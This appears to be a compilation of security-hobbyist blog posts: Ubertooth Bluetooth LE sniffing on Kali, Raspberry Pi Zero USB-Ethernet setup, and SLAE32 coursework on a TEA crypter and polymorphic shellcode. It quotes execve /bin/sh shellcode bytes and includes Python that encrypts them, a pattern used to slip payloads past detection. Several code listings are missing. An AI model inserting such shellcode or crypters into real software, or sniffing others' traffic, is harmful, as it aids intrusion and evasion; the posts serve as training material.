Setting up Ubertooth One – Kali

Install essential packages and updates
Login to Kali as root/toor
apt-get update
apt-get install kali-linux-sdr
apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config libpcap-dev python-numpy python-pyside python-qt4 libgtk2.0-dev libusb-dev bluez

Install the Bluetooth baseband decoding library
wget https://github.com/greatscottgadgets/libbtbb/archive/2015-10-R1.tar.gz -O libbtbb-2015-10-R1.tar.gz
tar xf libbtbb-2015-10-R1.tar.gz
cd libbtbb-2015-10-R1
mkdir build
cd build
cmake ..
make
make install
ldconfig

Install Ubertooth tools
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2015-10-R1/ubertooth-2015-10-R1.tar.xz -O ubertooth-2015-10-R1.tar.xz
tar xf ubertooth-2015-10-R1.tar.xz
cd ubertooth-2015-10-R1/host
mkdir build
cd build
cmake ..
make
make install
ldconfig

Visualizing the 2.4 GHz spectrum
git clone https://www.kismetwireless.net/spectools.git
cd spectools
./configure
make
make install
spectool_gtk

The last command opens the WiSPY window. Click “Open Device”, select “Ubertooth One USB” and click Enable. If you don’t see anything in the three views (Spectral, Topo, Planar), try physically disconnecting and reconnecting the Ubertooth One.

Activity is In-Progress – File is downloading.

Activity is done – File download is completed.

Determine the installed firmware version
#ubertooth-util -V
ubertooth 2015-10-R1 (dominicgs@hydrogen) Mon Oct 12 22:30:57 BST 2015

Known Limitations
The BLE sniffer can only scan 1 of the 3 advertising channels at a time (channel 37 on 2402 MHz, channel 38 on 2426 MHz and channel 39 on 2480 MHz). This is a hardware limitation: the Ubertooth has a single narrowband radio chip (the CC2400), which can only be tuned to one frequency at a time. So when sniffing the BLE advertising channels you have a 33.3% chance of being on the correct channel for a specific connection. The workaround is to keep trying until you are lucky enough to be on the right channel at the right time, or to get 3 Ubertooth dongles, each tuned to monitor 1 of the advertising channels.

Sniff Bluetooth LE Packets
1. Using the default Linux Bluetooth utilities: # /etc/init.d/bluetooth restart && hcitool dev && hcitool scan
2. Using the ubertooth-scan from Ubertooth utilities: # ubertooth-scan -b hcil -t 40 -x
3. Using the ubertooth-btle from Ubertooth utilities (capture Bluetooth LE (Low Energy)) in promiscuous mode:
# ubertooth-btle -p
Sample output:
systime=1481409606 freq=2440 addr=f605c0cd delta_t=24.492 ms
61 bc ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b c9 d2 67 df 98 40 d1 e4 02 db 18 4c 52 6f c8 0d
Data / AA f605c0cd (valid) / 28 bytes
Channel Index: 17
LLID: 1 / LL Data PDU / empty or L2CAP continuation
NESN: 0 SN: 0 MD: 0

Data: ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b
CRC: c9 d2 67

4. Using the ubertooth-btle again, but this time save the traffic in a PCAP file for post-examination:
# ubertooth-btle -p -c /tmp/capture.pcap

5. Using ubertooth-btle again, observe in real time (you have a 1 in 3 chance of being on the correct advertising channel, due to the known limitation described earlier):
# mkfifo /tmp/fifopipe0
# ubertooth-btle -f -c /tmp/fifopipe0 &

Open Wireshark |  click Capture | Options | click “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0” | click Save | click Close | click “Start”

or, launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 &

6. If you have 3 Ubertooth devices you can overcome the limitation described in the “Known Limitations” section and monitor all 3 advertising channels:

# mkfifo /tmp/fifopipe0 && mkfifo /tmp/fifopipe1 && mkfifo /tmp/fifopipe2
# ubertooth-btle -U0 -A37 -f -c /tmp/fifopipe0 &
# ubertooth-btle -U1 -A38 -f -c /tmp/fifopipe1 &
# ubertooth-btle -U2 -A39 -f -c /tmp/fifopipe2 &

then, either launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 -i /tmp/fifopipe1 -i /tmp/fifopipe2 &

or,
Open Wireshark |  click Capture | Options | click “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0”, repeat for “/tmp/fifopipe1” and “/tmp/fifopipe2” | click Save | click Close | click “Start”

Viewing Bluetooth Packets in Wireshark
# wireshark /tmp/capture.pcap
go to Edit | Preferences | Protocols | select DLT_USER and click on Edit… | click on “+” to add | ensure the new value reads “User 0 (DLT=147)” | in the “Payload protocol” column enter “btle” | OK | OK

Useful Wireshark filters
1. Connection requests and non-zero data packets:
btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05

2. Ignore empty PDU (Keep-alive packet):
not btle.data_header.llid==0001
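The following is an added example (not code from the original post or from the Ubertooth project) that parses the text output of ubertooth-btle shown in the “Sniff Bluetooth LE Packets” section and applies the same two rules as the Wireshark filters above, so you can see exactly which header bits those filters test. The first packet in the sample is the one quoted in the post; the CONNECT_REQ and the empty keep-alive PDU are constructed. The 5-bit length mask on the data header follows the Bluetooth 4.0/4.1 PDU format, which is what the 2015-10-R1 tool output above reflects (0xbc & 0x1f == 28); the fixed advertising access address 8e89bed6 is from the specification.

```python
import re

# Constructed sample input: packet 1 is the ubertooth-btle output quoted in
# the post, packet 2 (a CONNECT_REQ on the advertising access address) and
# packet 3 (an empty keep-alive PDU) are made up for this example.
SAMPLE = """\
systime=1481409606 freq=2440 addr=f605c0cd delta_t=24.492 ms
61 bc ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b c9 d2 67 df 98 40 d1 e4 02 db 18 4c 52 6f c8 0d
Data / AA f605c0cd (valid) / 28 bytes
Channel Index: 17
LLID: 1 / LL Data PDU / empty or L2CAP continuation
NESN: 0 SN: 0 MD: 0

Data: ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b
CRC: c9 d2 67

systime=1481409607 freq=2402 addr=8e89bed6 delta_t=1.000 ms
05 22 11 22 33 44 55 66 aa bb cc dd ee ff cd c0 05 f6 a1 b2 c3 08 05 00 27 00 00 00 48 00 ff ff ff ff 1f 0a 12 34 56

systime=1481409608 freq=2440 addr=f605c0cd delta_t=48.750 ms
01 00 aa bb cc
"""

ADV_AA = "8e89bed6"  # fixed access address of the three advertising channels
HEADER_RE = re.compile(r"systime=(\d+) freq=(\d+) addr=([0-9a-f]{8}) delta_t=([\d.]+) ms")


def parse_data_pdu(raw):
    """LL Data PDU: raw[0] is the header (LLID bits 0-1, NESN bit 2, SN bit 3,
    MD bit 4); raw[1] carries the length in its low 5 bits (BT 4.0/4.1), the
    upper bits are reserved.  Payload is followed by the 3-byte CRC; the
    extra trailing bytes ubertooth prints are discarded."""
    hdr, length = raw[0], raw[1] & 0x1f
    return {"kind": "data", "llid": hdr & 0x03, "nesn": (hdr >> 2) & 1,
            "sn": (hdr >> 3) & 1, "md": (hdr >> 4) & 1, "length": length,
            "payload": raw[2:2 + length], "crc": raw[2 + length:2 + length + 3]}


def parse_adv_pdu(raw):
    """Advertising PDU: raw[0] holds PDU type (bits 0-3), TxAdd (6), RxAdd (7);
    raw[1] holds the length in its low 6 bits."""
    hdr, length = raw[0], raw[1] & 0x3f
    payload = raw[2:2 + length]
    pkt = {"kind": "adv", "pdu_type": hdr & 0x0f, "tx_add": (hdr >> 6) & 1,
           "rx_add": (hdr >> 7) & 1, "length": length, "payload": payload,
           "crc": raw[2 + length:2 + length + 3]}
    if pkt["pdu_type"] == 0x05 and length == 34:
        # CONNECT_REQ: InitA(6) AdvA(6) LLData(22); LLData starts with the
        # little-endian access address the new connection will use.
        pkt["new_aa"] = payload[12:16][::-1].hex()
    return pkt


def parse_capture(text):
    """One dict per packet: the 'systime=' line plus the raw hex line that
    follows it; the decoded lines ubertooth prints afterwards are skipped."""
    packets, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        m = HEADER_RE.match(lines[i])
        if not m:
            i += 1
            continue
        raw = bytes.fromhex(lines[i + 1].replace(" ", ""))
        pkt = {"systime": int(m.group(1)), "freq": int(m.group(2)),
               "aa": m.group(3), "delta_t_ms": float(m.group(4))}
        pkt.update(parse_adv_pdu(raw) if pkt["aa"] == ADV_AA else parse_data_pdu(raw))
        packets.append(pkt)
        i += 2
    return packets


def is_interesting(pkt):
    """Filter 1: btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05."""
    if pkt["kind"] == "data":
        return pkt["length"] > 0
    return pkt["pdu_type"] == 0x05


def matches_page_filter_2(pkt):
    """Filter 2 as written above: drop every data PDU with LLID 1.  Note this
    also hides L2CAP continuation fragments (LLID 1, non-zero length) such as
    the 28-byte sample packet, not only the empty keep-alive PDU."""
    return not (pkt["kind"] == "data" and pkt["llid"] == 1)


def is_empty_pdu(pkt):
    """The actual keep-alive 'empty PDU': LLID 1 and a zero-length payload."""
    return pkt["kind"] == "data" and pkt["llid"] == 1 and pkt["length"] == 0


if __name__ == "__main__":
    for p in parse_capture(SAMPLE):
        print(p["kind"], p["aa"], "len=%d" % p["length"], "filter1=%s" % is_interesting(p),
              "filter2=%s" % matches_page_filter_2(p), "empty=%s" % is_empty_pdu(p))
```

Running the block prints one line per packet; the sample data packet passes filter 1 but is hidden by filter 2, which is worth knowing before you use that filter to hunt for L2CAP data.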


Raspberry Pi Zero OTG – MacOSX

Download

  1. Raspbian: as of 10/Dec/2016 this downloads Raspbian Jessie with the PIXEL (Pi Improved X-windows Environment, Lightweight) desktop
  2. Etcher v1 for Darwin x64, to flash Raspbian onto the SD card. Visit the main site for more info
  3. SDFormatter, to format the SD card

Configuring Raspberry Pi Zero to Emulate Ethernet Over USB

Once you have flashed the Raspbian image onto the SD card:

  1. Open the file config.txt at the root of the mounted drive
  2. Add the following line at the very bottom: dtoverlay=dwc2
  3. Open the file cmdline.txt at the root of the mounted drive
  4. Add the following after the rootwait parameter: modules-load=dwc2,g_ether
  5. Create a file called ssh at the root of the mounted drive; it can contain any text you like, or nothing at all: touch /Volumes/boot/ssh

Note: SSH will be disabled by default on the images from version 1.1 (2016-11-25-raspbian-jessie, Raspberry Pi reference 2016-11-25). When the Pi boots, it looks for the ssh file; if it finds it, it enables SSH and then deletes the file.
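An added example (not from the original post) that performs steps 2, 4 and 5 above on the file contents, idempotently, so the script can be rerun on an already-prepared card. The two sample file contents are constructed to resemble a fresh Raspbian Jessie boot partition; the apply_to_boot helper and its /Volumes/boot path are assumptions for macOS. The one point the list above leaves implicit is that cmdline.txt is a single line, and the kernel only reads the first line, so modules-load has to be spliced into that line rather than added as a new one.

```python
import pathlib

OVERLAY = "dtoverlay=dwc2"
GADGET_MODULES = ("dwc2", "g_ether")

# Constructed samples resembling a fresh Raspbian Jessie boot partition.
SAMPLE_CONFIG = "# Enable audio (loads snd_bcm2835)\ndtparam=audio=on\n"
SAMPLE_CMDLINE = ("dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 "
                  "root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline "
                  "fsck.repair=yes rootwait quiet splash plymouth.ignore-serial-consoles\n")


def add_dwc2_overlay(config_txt):
    """Step 2: append 'dtoverlay=dwc2' as the last line of config.txt,
    only if it is not already present."""
    lines = config_txt.splitlines()
    if OVERLAY not in (l.strip() for l in lines):
        lines.append(OVERLAY)
    return "\n".join(lines) + "\n"


def add_gadget_modules(cmdline_txt):
    """Step 4: put 'modules-load=dwc2,g_ether' right after 'rootwait'.

    cmdline.txt is one line of space-separated kernel parameters and the
    kernel reads only the first line, so the parameter is spliced into that
    line.  If a modules-load= parameter already exists, the two modules are
    merged into it instead of adding a duplicate parameter.
    """
    params = cmdline_txt.strip().split()
    for i, p in enumerate(params):
        if p.startswith("modules-load="):
            mods = p[len("modules-load="):].split(",")
            mods += [m for m in GADGET_MODULES if m not in mods]
            params[i] = "modules-load=" + ",".join(mods)
            break
    else:
        if "rootwait" not in params:
            raise ValueError("rootwait parameter not found in cmdline.txt")
        params.insert(params.index("rootwait") + 1,
                      "modules-load=" + ",".join(GADGET_MODULES))
    return " ".join(params) + "\n"


def apply_to_boot(boot_dir="/Volumes/boot"):
    """Rewrite both files in the mounted boot partition (assumed path for
    macOS) and create the empty 'ssh' marker file from step 5."""
    boot = pathlib.Path(boot_dir)
    cfg, cmd = boot / "config.txt", boot / "cmdline.txt"
    cfg.write_text(add_dwc2_overlay(cfg.read_text()))
    cmd.write_text(add_gadget_modules(cmd.read_text()))
    (boot / "ssh").touch()


if __name__ == "__main__":
    print(add_dwc2_overlay(SAMPLE_CONFIG), end="")
    print(add_gadget_modules(SAMPLE_CMDLINE), end="")
```

Run it with the card mounted (python3 script.py after calling apply_to_boot) and check afterwards with wc -l /Volumes/boot/cmdline.txt that the file is still one line.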

Connecting to the Pi Zero with USB and SSH on MACOSX

  1. Connect the USB cable to your Mac and the other end to the micro USB port. The Raspberry Pi Zero has 2 micro USB ports: the one towards the side of the board is dedicated to the power supply, the other one is for data.
  2. Try pinging raspberrypi.local as: ping raspberrypi.local
  3. If you can reach the host then ssh: ssh pi@raspberrypi.local
  4. The password for user pi is raspberry
  5. If ping fails with “Request timeout”, then on your Mac open “System Preferences” | “Sharing” | enable “Internet Sharing” | in the “To computers using” section enable “RNDIS/Ethernet Gadget”
  6. Disconnect/reconnect the USB cable
  7. Now you should be able to ping and ssh

If you still cannot connect to your Raspberry Pi Zero, try the following:

  1. Try turning off Networking / WiFi
  2. Replace the USB to micro USB cable
  3. Ensure Internet Sharing is enabled for “RNDIS/Ethernet Gadget”
  4. Install the HoRNDIS (pronounced “horrendous”) driver for Mac OS X; it allows you to use your Android phone’s native USB tethering mode to get Internet access.

SLAE32 Assignment 7 – Custom Crypter

Note: All related code can be found at My Github Repository.

Task:
– Create one program to encrypt the shellcode
– Create another program to decrypt and execute it

For this task we picked the Tiny Encryption Algorithm (TEA). It is a block cipher notable for the simplicity of its description and implementation, designed by David Wheeler and Roger Needham of the Cambridge Computer Laboratory.

As input we use the shellcode (\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80) extracted from the execve-stack file, which simply spawns a /bin/sh shell.

Take the execve.nasm file

Compile and link the execve.nasm:

Use objdump to get the opcodes for execve.nasm

Of course, we could easily complicate the shellcode further, e.g.:
1. Use the XOREncoder.py with the opcodes from execve.nasm
2. Run “python XOREncoder.py” take the output 0x…
3. Update xor-decoder.nasm using the output from “python XOREncoder.py”
4. Compile and link the updated xor-decoder.nasm
5. Use objdump to get the opcodes from the compiled/linked xor-decoder
6. Feed our TEA encrypter with the opcodes from xor-decoder

TEA Encryptor

Compile and run

TEA DeCrypter & Executor

Compile and run
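Since the encrypter and decrypter listings are not reproduced here, the following is an added example (my own, not the post's C programs) of the TEA round trip over the 25-byte execve shellcode quoted above: the reference 32-round cipher, PKCS#7-style padding so the 25-byte length survives the 8-byte block size, and little-endian words so the byte layout matches what a C program on x86 sees through a uint32_t pointer. The key is constructed, blocks are chained in ECB mode (each 8-byte block independently, so identical blocks would produce identical ciphertext), and nothing is executed; the output is only formatted in the \x.. notation used in the post.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF
ROUNDS = 32

# The 25-byte shellcode from the post (execve /bin/sh) and a constructed
# 128-bit key (16 bytes).
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
KEY = b"SLAE-461-TEA-key"


def tea_encrypt_block(v0, v1, k):
    """One 64-bit block through the reference TEA: 32 rounds, key k[0..3]."""
    s = 0
    for _ in range(ROUNDS):
        s = (s + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) & MASK) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + ((((v0 << 4) & MASK) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, k):
    """Inverse of tea_encrypt_block: the same rounds run backwards, starting
    from sum = 32 * DELTA."""
    s = (DELTA * ROUNDS) & MASK
    for _ in range(ROUNDS):
        v1 = (v1 - ((((v0 << 4) & MASK) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - ((((v1 << 4) & MASK) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        s = (s - DELTA) & MASK
    return v0, v1


def pad(data):
    """PKCS#7-style padding to a multiple of the 8-byte block size; the
    original length (25 here) is recovered by unpad after decryption."""
    n = 8 - len(data) % 8
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= 8 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding (wrong key or corrupted data)")
    return data[:-n]


def tea_encrypt(data, key):
    """ECB over the padded buffer; words are little-endian like x86 memory."""
    k = struct.unpack("<4I", key)
    padded = pad(data)
    out = bytearray()
    for off in range(0, len(padded), 8):
        v0, v1 = struct.unpack_from("<2I", padded, off)
        out += struct.pack("<2I", *tea_encrypt_block(v0, v1, k))
    return bytes(out)


def tea_decrypt(data, key):
    k = struct.unpack("<4I", key)
    out = bytearray()
    for off in range(0, len(data), 8):
        v0, v1 = struct.unpack_from("<2I", data, off)
        out += struct.pack("<2I", *tea_decrypt_block(v0, v1, k))
    return unpad(bytes(out))


def as_c_string(data):
    """Format bytes in the \\x.. notation used in the post."""
    return "".join("\\x%02x" % b for b in data)


if __name__ == "__main__":
    ct = tea_encrypt(SHELLCODE, KEY)
    print("encrypted (%d bytes): %s" % (len(ct), as_c_string(ct)))
    print("round trip OK:", tea_decrypt(ct, KEY) == SHELLCODE)
```

The padding check in unpad is what makes a wrong key fail loudly most of the time instead of silently producing garbage; it is not an integrity check, so a real design would add a MAC over the ciphertext.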

#####
This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE- 461
#####


SLAE32 Assignment 6 – Polymorphic Shellcode III

Note: All related code can be found at My Github Repository.

Task:
– Create a new version (polymorphic) of an existing shellcode taken from www.shell-storm.org
– The new version of the shellcode should not be more than 150% of the original code

Copy code from http://shell-storm.org/shellcode/files/shellcode-213.php

Add in line 35, the following: printf("Shellcode Length: %d\n", strlen(shellcode));
Add in the following at the top of the program:

Compile with the highlighted changes and run:

Let’s put the code in an assembly skeleton program and transform it to Intel syntax:

Assemble:

Link:

Run to test it is working:

Now let’s attempt to change a few bits in the code, deleted code is prefixed/enclosed with ; or ;-----------:

Compile and run:

Do a quick disassembly:

Extract the shellcode:

Now copy the shellcode into your C shellcode skeleton program (213.v1.in.c.program.c), as:

Compile and run again:

Bonus proggie to play with stime function:

#####
This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE- 461
#####
